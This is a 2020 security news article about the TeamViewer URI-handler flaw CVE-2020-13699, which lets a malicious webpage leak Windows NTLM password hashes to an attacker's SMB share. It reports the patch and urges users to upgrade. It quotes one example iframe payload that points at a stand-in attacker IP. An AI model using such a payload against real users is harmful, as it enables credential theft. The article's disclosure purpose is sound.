Posted on August 11, 2020 at 3:44 PM
Security researchers have warned that there is vulnerability currently in TeamViewer that could allow hackers remotely steal system passwords. Users have been advised to run the latest version of remote desktop software for Windows to prevent any vulnerability attack on their systems.
The TeamViewer team recently released an update of its software to help its users get the latest version of the software to stay more protected. The update includes a patch for a severe vulnerability (CVE 2020-13699), which could allow attackers to steal system passwords and compromise the systems if exploited by hackers.
However, the most worrying thing is the fact that anyone who intends to exploit the vulnerability can execute the attack almost automatically without any need to have interaction with the victims. They only need to convince them to visit a malicious webpage to set up the attack.
For those who don’t know, TeamViewer is a widely known remote-support software that enables users to share their desktop remotely and take complete control of the other’s PC from anywhere in the world.
The software is available for mobile and desktop operating systems, including Blackberry, Windows Phone 8, Android, iOS, Chrome OS, Linux, macOS, as well as Windows.
The vulnerability allows the relay of NTLM authentication request
The vulnerability was discovered by Jeffrey Hofmann of Praetorian. As he reported, the high-risk vulnerability is found in the process the platform quotes its custom URI handlers. It may enable attackers to force the software, thereby relaying an NTLM authentication request to the hacker’s system.
“An attacker could embed a malicious iframe in a website with a crafted URL (iframe src=’teamviewer10: –play \\attacker-IP\share\fake.tvs’),” Hoffman explained.
He further pointed out that Windows will carry out NTLM authentication when opening the SMB share relaying the request with a responder tool for code execution.
The vulnerability impacts the TeamViewer versions from version 8 to version 15 for the Windows platform.
On a simpler note, the attacker can take advantage of the URI scheme of TeamViewer through a webpage to track the installed application on the target system into setting up a connection to the remote SMB share owned by the attackers.
As a result, it initiates that SMB authentication attack, leaking the server’s username as well as the hashed version of the password to the attackers. This allows them to make use of stolen details to access the network resources or computer of the victim.
To exploit the vulnerability successfully, the hacker will need to fix a malicious iframe on a webpage and lure victims to visit the page Once the victim clicks the malicious webpage, its automatically sets up the Windows desktop client and open a remote SMB share.
When opening the SMB share, the Windows operating system of the victim will perform NTLM authentication using a responder with delayed requests.
The vulnerability is known as “Unquoted URI handler”, and it impacts URI handlers teamviewer10, tvvpn1, Tvvideocall1, tvsqsupport1, tvsqcuctomer1, and Tvsendfile1. The TeamViewer project has patched up the vulnerability by quoting the parameters released by the targeted URI handlers.
Users are advised to upgrade their systems
For now, hackers have not started exploiting the vulnerability in the wild. However, with the popularity of the TeamViewer software, it won’t take long before some hackers start exploiting the vulnerability. Millions of users are currently using the TeamViewer app and the massive number of users is enough to interest hackers.
Users are advised to get the latest update to the software to the 15.8.3 version because hackers may soon pay interest in the vulnerability and decide to exploit. Security experts are advising that users of the software should get an upgrade to their system or face the likelihood of an attack on their Windows PCs by hackers. This is not the first SMB-authenticat9ion attack in recent times. a similar attack was initially disclosed in signal messenger, zoom video conferencing, and Google Chrome.